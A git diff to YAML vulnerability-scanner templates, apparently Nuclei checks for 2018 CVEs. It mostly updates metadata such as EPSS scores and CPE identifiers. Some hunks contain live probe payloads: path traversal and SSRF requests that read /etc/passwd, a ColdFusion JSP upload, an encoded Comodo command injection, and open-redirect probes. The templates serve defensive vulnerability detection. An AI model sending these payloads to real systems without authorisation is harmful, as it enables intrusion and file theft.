@@ info: - https://usn.ubuntu.com/3726-1/ - http://web.archive.org/web/20211206044224/https://securitytracker.com/id/1041403 - https://www.debian.org/security/2018/dsa-4264 - - http://web.archive.org/web/20210124194607/https://www.securityfocus.com/bid/104970/ - https://access.redhat.com/errata/RHSA-2019:0265 - https://nvd.nist.gov/vuln/detail/CVE-2018-14574 classification: @@ -18,9 +17,13 @@ info: cvss-score: 6.1 cve-id: CVE-2018-14574 cwe-id: CWE-601 - tags: cve,cve2018,django,redirect + epss-score: 0.00962 + cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: djangoproject + product: django + tags: cve,cve2018,django,redirect http: - method: GET @@ -29,11 +32,12 @@ http: matchers-condition: and matchers: - - type: status - status: - - 301 - type: word + part: header words: - "Location: https://www.interact.sh" - "Location: http://www.interact.sh" - part: header + + - type: status + status: + - 301 diff --git a/http/cves/2018/CVE-2018-14728.yaml b/http/cves/2018/CVE-2018-14728.yaml index 40d69109b0..0345e2dd59 100644 --- a/http/cves/2018/CVE-2018-14728.yaml +++ b/http/cves/2018/CVE-2018-14728.yaml @@ -14,19 +14,22 @@ info: cvss-score: 9.8 cve-id: CVE-2018-14728 cwe-id: CWE-918 - tags: cve,cve2018,ssrf,lfi,packetstorm,edb + epss-score: 0.96872 + cpe: cpe:2.3:a:tecrail:responsive_filemanager:9.13.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: tecrail + product: responsive_filemanager + tags: cve,cve2018,ssrf,lfi,packetstorm,edb,intrusive http: - method: POST path: - "{{BaseURL}}/filemanager/upload.php" - body: "fldr=&url=file:///etc/passwd" - + body: fldr=&url=file:///etc/passwd matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body diff --git a/http/cves/2018/CVE-2018-14912.yaml b/http/cves/2018/CVE-2018-14912.yaml index dfc1d0de73..b953b2716f 100644 --- a/http/cves/2018/CVE-2018-14912.yaml +++ b/http/cves/2018/CVE-2018-14912.yaml @@ -10,14 +10,19 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2018-14912 - https://lists.zx2c4.com/pipermail/cgit/2018-August/004176.html - https://bugs.chromium.org/p/project-zero/issues/detail?id=1627 + - https://lists.debian.org/debian-lts-announce/2018/08/msg00005.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-14912 cwe-id: CWE-22 - tags: cve,cve2018,cgit,lfi + epss-score: 0.97328 + cpe: cpe:2.3:a:cgit_project:cgit:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cgit_project + product: cgit + tags: cve,cve2018,cgit,lfi http: - method: GET diff --git a/http/cves/2018/CVE-2018-14916.yaml b/http/cves/2018/CVE-2018-14916.yaml index 1255073c74..ec3e53d1fb 100644 --- a/http/cves/2018/CVE-2018-14916.yaml +++ b/http/cves/2018/CVE-2018-14916.yaml @@ -15,9 +15,13 @@ info: cvss-score: 9.1 cve-id: CVE-2018-14916 cwe-id: CWE-732 - tags: cve2018,loytec,lfi,packetstorm,seclists,cve + epss-score: 0.00483 + cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: loytec + product: lgate-902_firmware + tags: cve2018,loytec,lfi,packetstorm,seclists,cve http: - method: GET @@ -26,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git a/http/cves/2018/CVE-2018-14918.yaml b/http/cves/2018/CVE-2018-14918.yaml index 786baa0e19..421ee00d8f 100644 --- a/http/cves/2018/CVE-2018-14918.yaml +++ b/http/cves/2018/CVE-2018-14918.yaml @@ -15,10 +15,14 @@ info: cvss-score: 7.5 cve-id: CVE-2018-14918 cwe-id: CWE-22 + epss-score: 0.4378 + cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.html:"LGATE-902" verified: true + vendor: loytec + product: lgate-902_firmware tags: loytec,lfi,seclists,packetstorm,cve,cve2018,lgate http: diff --git a/http/cves/2018/CVE-2018-14931.yaml b/http/cves/2018/CVE-2018-14931.yaml index 3a71012a18..d9cf3f4c5a 100644 --- a/http/cves/2018/CVE-2018-14931.yaml +++ b/http/cves/2018/CVE-2018-14931.yaml @@ -13,13 +13,16 @@ info: cvss-score: 6.1 cve-id: CVE-2018-14931 cwe-id: CWE-601 - tags: cve,cve2018,redirect,polarisft,intellect + epss-score: 0.00118 + cpe: cpe:2.3:a:polarisft:intellect_core_banking:9.7.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: polarisft + product: intellect_core_banking + tags: cve,cve2018,redirect,polarisft,intellect http: - method: GET - path: - '{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.interact.sh' diff --git a/http/cves/2018/CVE-2018-15138.yaml b/http/cves/2018/CVE-2018-15138.yaml index 00e9db5066..b4aa70e2de 100644 --- a/http/cves/2018/CVE-2018-15138.yaml +++ b/http/cves/2018/CVE-2018-15138.yaml @@ -14,9 +14,13 @@ info: cvss-score: 7.5 cve-id: CVE-2018-15138 cwe-id: CWE-22 - tags: cve,cve2018,ericsson,lfi,traversal,edb + epss-score: 0.31973 + cpe: cpe:2.3:a:ericssonlg:ipecs_nms:30m-2.3gn:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: ericssonlg + product: ipecs_nms + tags: cve,cve2018,ericsson,lfi,traversal,edb http: - method: GET @@ -25,6 +29,7 @@ http: - "{{BaseURL}}/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg" stop-at-first-match: true + matchers-condition: and matchers: - type: regex diff --git a/http/cves/2018/CVE-2018-15517.yaml b/http/cves/2018/CVE-2018-15517.yaml index c4b8e8b59c..ddda32c21c 100644 --- a/http/cves/2018/CVE-2018-15517.yaml +++ b/http/cves/2018/CVE-2018-15517.yaml @@ -15,9 +15,13 @@ info: cvss-score: 8.6 cve-id: CVE-2018-15517 cwe-id: CWE-918 - tags: seclists,packetstorm,cve,cve2018,dlink,ssrf,oast + epss-score: 0.01414 + cpe: cpe:2.3:a:dlink:central_wifimanager:1.03:r0098:*:*:*:*:*:* metadata: max-request: 1 + vendor: dlink + product: central_wifimanager + tags: seclists,packetstorm,cve,cve2018,dlink,ssrf,oast http: - method: GET diff --git a/http/cves/2018/CVE-2018-15535.yaml b/http/cves/2018/CVE-2018-15535.yaml index 54bb89a0ef..ec4c24bbfd 100644 --- a/http/cves/2018/CVE-2018-15535.yaml +++ b/http/cves/2018/CVE-2018-15535.yaml @@ -15,9 +15,13 @@ info: cvss-score: 7.5 cve-id: CVE-2018-15535 cwe-id: CWE-22 - tags: cve,cve2018,lfi,edb,seclists + epss-score: 0.9713 + cpe: cpe:2.3:a:tecrail:responsive_filemanager:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: tecrail + product: responsive_filemanager + tags: cve,cve2018,lfi,edb,seclists http: - method: GET @@ -26,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2018/CVE-2018-15745.yaml b/http/cves/2018/CVE-2018-15745.yaml index 108f8706a2..06225dbd1d 100644 --- a/http/cves/2018/CVE-2018-15745.yaml +++ b/http/cves/2018/CVE-2018-15745.yaml @@ -16,9 +16,13 @@ info: cvss-score: 7.5 cve-id: CVE-2018-15745 cwe-id: CWE-22 - tags: packetstorm,edb,cve,cve2018,argussurveillance,lfi,dvr + epss-score: 0.96738 + cpe: cpe:2.3:a:argussurveillance:dvr:4.0.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: argussurveillance + product: dvr + tags: packetstorm,edb,cve,cve2018,argussurveillance,lfi,dvr http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/cves/2018/CVE-2018-15961.yaml b/http/cves/2018/CVE-2018-15961.yaml index 8847ddaf86..dd68e261cf 100644 --- a/http/cves/2018/CVE-2018-15961.yaml +++ b/http/cves/2018/CVE-2018-15961.yaml @@ -10,14 +10,19 @@ info: - https://github.com/xbufu/CVE-2018-15961 - https://helpx.adobe.com/security/products/coldfusion/apsb18-33.html - http://web.archive.org/web/20220309060906/http://www.securitytracker.com/id/1041621 + - http://www.securitytracker.com/id/1041621 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-15961 cwe-id: CWE-434 + epss-score: 0.97474 + cpe: cpe:2.3:a:adobe:coldfusion:11.0:-:*:*:*:*:*:* metadata: max-request: 2 shodan-query: http.component:"Adobe ColdFusion" + vendor: adobe + product: coldfusion tags: cve,cve2018,adobe,rce,coldfusion,fileupload,kev,intrusive http: @@ -53,17 +58,15 @@ http: {{randstr}}.jsp -----------------------------24464570528145-- - - | GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - - type: word words: - - "ddbb3e76f92e78c445c8ecb392beb225" # MD5 of CVE-2018-15961 + - "ddbb3e76f92e78c445c8ecb392beb225" # MD5 of CVE-2018-15961 - type: status status: diff --git a/http/cves/2018/CVE-2018-16059.yaml b/http/cves/2018/CVE-2018-16059.yaml index f868909086..3bdf2ccf68 100644 --- a/http/cves/2018/CVE-2018-16059.yaml +++ b/http/cves/2018/CVE-2018-16059.yaml @@ -10,27 +10,33 @@ info: - https://ics-cert.us-cert.gov/advisories/ICSA-19-073-03 - https://nvd.nist.gov/vuln/detail/CVE-2018-16059 - https://www.exploit-db.com/exploits/45342/ + - https://cert.vde.com/en-us/advisories/vde-2019-002 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2018-16059 cwe-id: CWE-22 - tags: cve,cve2018,iot,lfi,edb + epss-score: 0.64355 + cpe: cpe:2.3:o:endress:wirelesshart_fieldgate_swg70_firmware:3.00.07:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: endress + product: wirelesshart_fieldgate_swg70_firmware + tags: cve,cve2018,iot,lfi,edb http: - method: POST path: - "{{BaseURL}}/fcgi-bin/wgsetcgi" + body: 'action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand' matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body - type: status status: diff --git a/http/cves/2018/CVE-2018-16133.yaml b/http/cves/2018/CVE-2018-16133.yaml index 6723a086ac..4e63f521f2 100644 --- a/http/cves/2018/CVE-2018-16133.yaml +++ b/http/cves/2018/CVE-2018-16133.yaml @@ -15,9 +15,13 @@ info: cvss-score: 5.3 cve-id: CVE-2018-16133 cwe-id: CWE-22 - tags: lfi,packetstorm,cve,cve2018,cybrotech + epss-score: 0.07059 + cpe: cpe:2.3:a:cybrotech:cybrohttpserver:1.0.3:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cybrotech + product: cybrohttpserver + tags: lfi,packetstorm,cve,cve2018,cybrotech http: - raw: diff --git a/http/cves/2018/CVE-2018-16139.yaml b/http/cves/2018/CVE-2018-16139.yaml index d2b8af37c2..e21bbe5fb1 100644 --- a/http/cves/2018/CVE-2018-16139.yaml +++ b/http/cves/2018/CVE-2018-16139.yaml @@ -14,10 +14,14 @@ info: cvss-score: 6.1 cve-id: CVE-2018-16139 cwe-id: CWE-79 + epss-score: 0.00135 + cpe: cpe:2.3:a:bibliosoft:bibliopac:2008:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: title:"Bibliopac" verified: true + vendor: bibliosoft + product: bibliopac tags: cve,cve2018,xss,bibliopac,bibliosoft http: diff --git a/http/cves/2018/CVE-2018-16159.yaml b/http/cves/2018/CVE-2018-16159.yaml index 8beb4420f9..f94ff71fc5 100644 --- a/http/cves/2018/CVE-2018-16159.yaml +++ b/http/cves/2018/CVE-2018-16159.yaml @@ -11,15 +11,21 @@ info: - https://wordpress.org/plugins/gift-voucher/ - https://www.exploit-db.com/exploits/45255/ - https://nvd.nist.gov/vuln/detail/CVE-2018-16159 + - https://wpvulndb.com/vulnerabilities/9117 remediation: Fixed in version 4.1.8. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-16159 cwe-id: CWE-89 + epss-score: 0.01316 + cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 verified: true + framework: wordpress + vendor: codemenschen + product: gift_vouchers tags: sqli,wordpress,unauth,wp,gift-voucher,cve2018,edb,wpscan,cve,wp-plugin http: diff --git a/http/cves/2018/CVE-2018-16167.yaml b/http/cves/2018/CVE-2018-16167.yaml index 9bf4abb64c..7e81b077af 100644 --- a/http/cves/2018/CVE-2018-16167.yaml +++ b/http/cves/2018/CVE-2018-16167.yaml @@ -15,9 +15,13 @@ info: cvss-score: 9.8 cve-id: CVE-2018-16167 cwe-id: CWE-78 - tags: rce,oast,edb,cve,cve2018,logontracer + epss-score: 0.13203 + cpe: cpe:2.3:a:jpcert:logontracer:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: jpcert + product: logontracer + tags: rce,oast,edb,cve,cve2018,logontracer,intrusive http: - raw: @@ -33,4 +37,4 @@ http: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - - "http" + - http diff --git a/http/cves/2018/CVE-2018-16283.yaml b/http/cves/2018/CVE-2018-16283.yaml index a941e3071e..4cd6f85204 100644 --- a/http/cves/2018/CVE-2018-16283.yaml +++ b/http/cves/2018/CVE-2018-16283.yaml @@ -10,14 +10,20 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2018-16283 - https://github.com/springjk/wordpress-wechat-broadcast/issues/14 - http://seclists.org/fulldisclosure/2018/Sep/32 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/150202 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-16283 cwe-id: CWE-22 - tags: edb,seclists,cve,cve2018,wordpress,wp-plugin,lfi + epss-score: 0.20198 + cpe: cpe:2.3:a:wechat_brodcast_project:wechat_brodcast:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: wechat_brodcast_project + product: wechat_brodcast + tags: edb,seclists,cve,cve2018,wordpress,wp-plugin,lfi http: - method: GET @@ -26,6 +32,6 @@ http: matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body diff --git a/http/cves/2018/CVE-2018-16288.yaml b/http/cves/2018/CVE-2018-16288.yaml index be533e9995..27494001c1 100644 --- a/http/cves/2018/CVE-2018-16288.yaml +++ b/http/cves/2018/CVE-2018-16288.yaml @@ -15,9 +15,13 @@ info: cvss-score: 8.6 cve-id: CVE-2018-16288 cwe-id: CWE-200 - tags: cve,cve2018,lfi,supersign,edb + epss-score: 0.1824 + cpe: cpe:2.3:a:lg:supersign_cms:2.5:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: lg + product: supersign_cms + tags: cve,cve2018,lfi,supersign,edb http: - method: GET @@ -26,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2018/CVE-2018-16299.yaml b/http/cves/2018/CVE-2018-16299.yaml index e9aad13aea..c42451709f 100644 --- a/http/cves/2018/CVE-2018-16299.yaml +++ b/http/cves/2018/CVE-2018-16299.yaml @@ -16,9 +16,14 @@ info: cvss-score: 7.5 cve-id: CVE-2018-16299 cwe-id: CWE-22 - tags: wordpress,lfi,plugin,wp,edb,packetstorm,cve,cve2018 + epss-score: 0.11104 + cpe: cpe:2.3:a:localize_my_post_project:localize_my_post:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: localize_my_post_project + product: localize_my_post + tags: wordpress,lfi,plugin,wp,edb,packetstorm,cve,cve2018 http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2018/CVE-2018-16668.yaml b/http/cves/2018/CVE-2018-16668.yaml index 1387eb8922..95b5a0cd96 100644 --- a/http/cves/2018/CVE-2018-16668.yaml +++ b/http/cves/2018/CVE-2018-16668.yaml @@ -15,11 +15,13 @@ info: cvss-score: 5.3 cve-id: CVE-2018-16668 cwe-id: CWE-287 + epss-score: 0.00374 cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* - epss-score: 0.00376 - tags: cve,cve2018,circarlife,scada,iot,disclosure,edb metadata: max-request: 1 + vendor: circontrol + product: circarlife_scada + tags: cve,cve2018,circarlife,scada,iot,disclosure,edb http: - method: GET @@ -32,6 +34,7 @@ http: part: header words: - "CirCarLife Scada" + - type: word part: body words: diff --git a/http/cves/2018/CVE-2018-16670.yaml b/http/cves/2018/CVE-2018-16670.yaml index e9c394de7b..e0ed2229df 100644 --- a/http/cves/2018/CVE-2018-16670.yaml +++ b/http/cves/2018/CVE-2018-16670.yaml @@ -15,9 +15,13 @@ info: cvss-score: 5.3 cve-id: CVE-2018-16670 cwe-id: CWE-287 - tags: scada,plc,iot,disclosure,edb,cve,cve2018,circarlife + epss-score: 0.00199 + cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: circontrol + product: circarlife_scada + tags: scada,plc,iot,disclosure,edb,cve,cve2018,circarlife http: - method: GET @@ -30,6 +34,7 @@ http: part: header words: - "CirCarLife Scada" + - type: word part: body words: diff --git a/http/cves/2018/CVE-2018-16671.yaml b/http/cves/2018/CVE-2018-16671.yaml index 710adc6fe7..004e7f3e11 100644 --- a/http/cves/2018/CVE-2018-16671.yaml +++ b/http/cves/2018/CVE-2018-16671.yaml @@ -14,9 +14,13 @@ info: cvss-score: 5.3 cve-id: CVE-2018-16671 cwe-id: CWE-200 - tags: iot,disclosure,edb,cve,cve2018,circarlife,scada + epss-score: 0.0038 + cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: "circontrol" + product: circarlife_scada + tags: iot,disclosure,edb,cve,cve2018,circarlife,scada http: - method: GET @@ -29,10 +33,12 @@ http: part: header words: - "CirCarLife Scada" + - type: word part: body words: - "circontrol" + - type: regex part: body regex: diff --git a/http/cves/2018/CVE-2018-16716.yaml b/http/cves/2018/CVE-2018-16716.yaml index b1f598c0ff..8b3b0cc0cc 100644 --- a/http/cves/2018/CVE-2018-16716.yaml +++ b/http/cves/2018/CVE-2018-16716.yaml @@ -13,9 +13,13 @@ info: cvss-score: 9.1 cve-id: CVE-2018-16716 cwe-id: CWE-22 - tags: cve,cve2018,ncbi,lfi + epss-score: 0.00581 + cpe: cpe:2.3:a:nih:ncbi_toolbox:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: nih + product: ncbi_toolbox + tags: cve,cve2018,ncbi,lfi http: - method: GET diff --git a/http/cves/2018/CVE-2018-16761.yaml b/http/cves/2018/CVE-2018-16761.yaml index b7f1b5b726..9da9921dbc 100644 --- a/http/cves/2018/CVE-2018-16761.yaml +++ b/http/cves/2018/CVE-2018-16761.yaml @@ -15,9 +15,13 @@ info: cvss-score: 6.1 cve-id: CVE-2018-16761 cwe-id: CWE-601 - tags: cve,cve2018,redirect,eventum,oss + epss-score: 0.00068 + cpe: cpe:2.3:a:eventum_project:eventum:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: eventum_project + product: eventum + tags: cve,cve2018,redirect,eventum,oss http: - method: GET diff --git a/http/cves/2018/CVE-2018-16763.yaml b/http/cves/2018/CVE-2018-16763.yaml index 8e24b573a8..01478c8d80 100644 --- a/http/cves/2018/CVE-2018-16763.yaml +++ b/http/cves/2018/CVE-2018-16763.yaml @@ -10,16 +10,19 @@ info: - https://www.getfuelcms.com/ - https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1 - https://nvd.nist.gov/vuln/detail/CVE-2018-16763 + - https://github.com/daylightstudio/FUEL-CMS/issues/478 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-16763 cwe-id: CWE-74 + epss-score: 0.75214 cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:*:*:*:*:*:*:*:* - epss-score: 0.88022 - tags: cve,cve2018,fuelcms,rce,edb metadata: max-request: 1 + vendor: thedaylightstudio + product: fuel_cms + tags: cve,cve2018,fuelcms,rce,edb http: - raw: @@ -29,9 +32,10 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: regex regex: - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/http/cves/2018/CVE-2018-16836.yaml b/http/cves/2018/CVE-2018-16836.yaml index b7a53f58e4..0f3c6a6bb1 100644 --- a/http/cves/2018/CVE-2018-16836.yaml +++ b/http/cves/2018/CVE-2018-16836.yaml @@ -15,11 +15,13 @@ info: cvss-score: 9.8 cve-id: CVE-2018-16836 cwe-id: CWE-22 + epss-score: 0.2221 cpe: cpe:2.3:a:rubedo_project:rubedo:*:*:*:*:*:*:*:* - epss-score: 0.25354 - tags: cve,cve2018,rubedo,lfi,edb metadata: max-request: 1 + vendor: rubedo_project + product: rubedo + tags: cve,cve2018,rubedo,lfi,edb http: - method: GET diff --git a/http/cves/2018/CVE-2018-16979.yaml b/http/cves/2018/CVE-2018-16979.yaml index 425266104f..2b47330554 100644 --- a/http/cves/2018/CVE-2018-16979.yaml +++ b/http/cves/2018/CVE-2018-16979.yaml @@ -14,9 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2018-16979 cwe-id: CWE-113 + epss-score: 0.00118 + cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:* metadata: max-request: 1 verified: true + vendor: monstra + product: monstra tags: cve,cve2018,crlf,mostra,mostracms,cms http: diff --git a/http/cves/2018/CVE-2018-17246.yaml b/http/cves/2018/CVE-2018-17246.yaml index 1c6e950de4..e41720066b 100644 --- a/http/cves/2018/CVE-2018-17246.yaml +++ b/http/cves/2018/CVE-2018-17246.yaml @@ -10,14 +10,19 @@ info: - https://www.elastic.co/community/security - https://discuss.elastic.co/t/elastic-stack-6-4-3-and-5-6-13-security-update/155594 - https://nvd.nist.gov/vuln/detail/CVE-2018-17246 + - https://access.redhat.com/errata/RHBA-2018:3743 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-17246 - cwe-id: CWE-829 - tags: cve,cve2018,lfi,kibana,vulhub + cwe-id: CWE-829,CWE-73 + epss-score: 0.96913 + cpe: cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: elastic + product: "kibana" + tags: cve,cve2018,lfi,kibana,vulhub http: - method: GET @@ -36,8 +41,8 @@ http: words: - "kbn-name" - "kibana" - condition: or case-insensitive: true + condition: or - type: word part: header diff --git a/http/cves/2018/CVE-2018-17254.yaml b/http/cves/2018/CVE-2018-17254.yaml index 25beccfb9e..de7ddf8978 100644 --- a/http/cves/2018/CVE-2018-17254.yaml +++ b/http/cves/2018/CVE-2018-17254.yaml @@ -14,11 +14,14 @@ info: cvss-score: 9.8 cve-id: CVE-2018-17254 cwe-id: CWE-89 - cpe: cpe:2.3:a:arkextensions:jck_editor:*:*:*:*:*:*:*:* - epss-score: 0.8697 - tags: cve,cve2018,packetstorm,edb,joomla,sqli + epss-score: 0.83749 + cpe: cpe:2.3:a:arkextensions:jck_editor:6.4.4:*:*:*:*:joomla\!:*:* metadata: max-request: 1 + framework: joomla\! + vendor: arkextensions + product: jck_editor + tags: cve,cve2018,packetstorm,edb,joomla,sqli http: - raw: diff --git a/http/cves/2018/CVE-2018-17422.yaml b/http/cves/2018/CVE-2018-17422.yaml index d0e250be5d..26a3a062a0 100644 --- a/http/cves/2018/CVE-2018-17422.yaml +++ b/http/cves/2018/CVE-2018-17422.yaml @@ -14,10 +14,14 @@ info: cvss-score: 6.1 cve-id: CVE-2018-17422 cwe-id: CWE-601 + epss-score: 0.00118 + cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:* metadata: max-request: 2 verified: true shodan-query: http.title:"dotCMS" + vendor: dotcms + product: dotcms tags: cve,cve2018,redirect,dotcms http: diff --git a/http/cves/2018/CVE-2018-17431.yaml b/http/cves/2018/CVE-2018-17431.yaml index 54d8394314..677e087c3c 100644 --- a/http/cves/2018/CVE-2018-17431.yaml +++ b/http/cves/2018/CVE-2018-17431.yaml @@ -10,16 +10,19 @@ info: - https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276 - https://nvd.nist.gov/vuln/detail/CVE-2018-17431 - https://github.com/Fadavvi/CVE-2018-17431-PoC#confirmation-than-bug-exist-2018-09-25-ticket-id-xwr-503-79437 + - https://drive.google.com/file/d/0BzFJhNQNHcoTbndsUmNjVWNGYWNJaWxYcWNyS2ZDajluTDFz/view classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-17431 cwe-id: CWE-287 + epss-score: 0.10458 cpe: cpe:2.3:a:comodo:unified_threat_management_firewall:*:*:*:*:*:*:*:* - epss-score: 0.09083 - tags: cve2018,comodo,rce,edb,cve metadata: max-request: 2 + vendor: comodo + product: unified_threat_management_firewall + tags: cve2018,comodo,rce,edb,cve http: - raw: @@ -27,7 +30,6 @@ http: GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1 Host: {{Hostname}} Connection: close - - | # to triggering RCE GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1 Host: {{Hostname}} @@ -36,9 +38,10 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "Configuration has been altered" - part: body + - type: status status: - 200 diff --git a/http/cves/2018/CVE-2018-18069.yaml b/http/cves/2018/CVE-2018-18069.yaml index 159dd06c56..0e5c1d8340 100644 --- a/http/cves/2018/CVE-2018-18069.yaml +++ b/http/cves/2018/CVE-2018-18069.yaml @@ -4,8 +4,7 @@ info: name: WordPress sitepress-multilingual-cms 3.6.3 - Cross-Site Scripting author: nadino severity: medium - description: WordPress plugin sitepress-multilingual-cms 3.6.3 is vulnerable to cross-site scripting in process_forms via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php - request to wp-admin/admin.php. + description: WordPress plugin sitepress-multilingual-cms 3.6.3 is vulnerable to cross-site scripting in process_forms via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php request to wp-admin/admin.php. reference: - https://0x62626262.wordpress.com/2018/10/08/sitepress-multilingual-cms-plugin-unauthenticated-stored-xss/ - https://nvd.nist.gov/vuln/detail/CVE-2018-18069 @@ -14,9 +13,14 @@ info: cvss-score: 6.1 cve-id: CVE-2018-18069 cwe-id: CWE-79 - tags: cve,cve2018,wordpress,xss,plugin + epss-score: 0.00106 + cpe: cpe:2.3:a:wpml:wpml:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: wpml + product: wpml + tags: cve,cve2018,wordpress,xss,plugin http: - method: POST @@ -25,7 +29,6 @@ http: body: | icl_post_action=save_theme_localization&locale_file_name_en=EN"> - host-redirects: true max-redirects: 2 matchers: diff --git a/http/cves/2018/CVE-2018-18264.yaml b/http/cves/2018/CVE-2018-18264.yaml index 40cc4c03d8..37d75235b8 100644 --- a/http/cves/2018/CVE-2018-18264.yaml +++ b/http/cves/2018/CVE-2018-18264.yaml @@ -11,14 +11,19 @@ info: - https://sysdig.com/blog/privilege-escalation-kubernetes-dashboard/ - https://groups.google.com/forum/#!topic/kubernetes-announce/yBrFf5nmvfI - https://nvd.nist.gov/vuln/detail/CVE-2018-18264 + - https://github.com/kubernetes/dashboard/pull/3400 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-18264 cwe-id: CWE-306 + epss-score: 0.97406 + cpe: cpe:2.3:a:kubernetes:dashboard:*:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: product:"Kubernetes" + vendor: kubernetes + product: dashboard tags: cve,cve2018,kubernetes,k8s,auth-bypass http: @@ -28,9 +33,9 @@ http: - "{{BaseURL}}/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs" stop-at-first-match: true + matchers-condition: and matchers: - - type: dsl dsl: - 'contains(body, "apiVersion") && contains(body, "objectRef")' diff --git a/http/cves/2018/CVE-2018-18323.yaml b/http/cves/2018/CVE-2018-18323.yaml index 2a494d6667..f50f23dafc 100644 --- a/http/cves/2018/CVE-2018-18323.yaml +++ b/http/cves/2018/CVE-2018-18323.yaml @@ -16,9 +16,13 @@ info: cvss-score: 7.5 cve-id: CVE-2018-18323 cwe-id: CWE-22 - tags: cve,cve2018,centos,lfi,packetstorm + epss-score: 0.97376 + cpe: cpe:2.3:a:control-webpanel:webpanel:0.9.8.480:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: control-webpanel + product: webpanel + tags: cve,cve2018,centos,lfi,packetstorm http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git 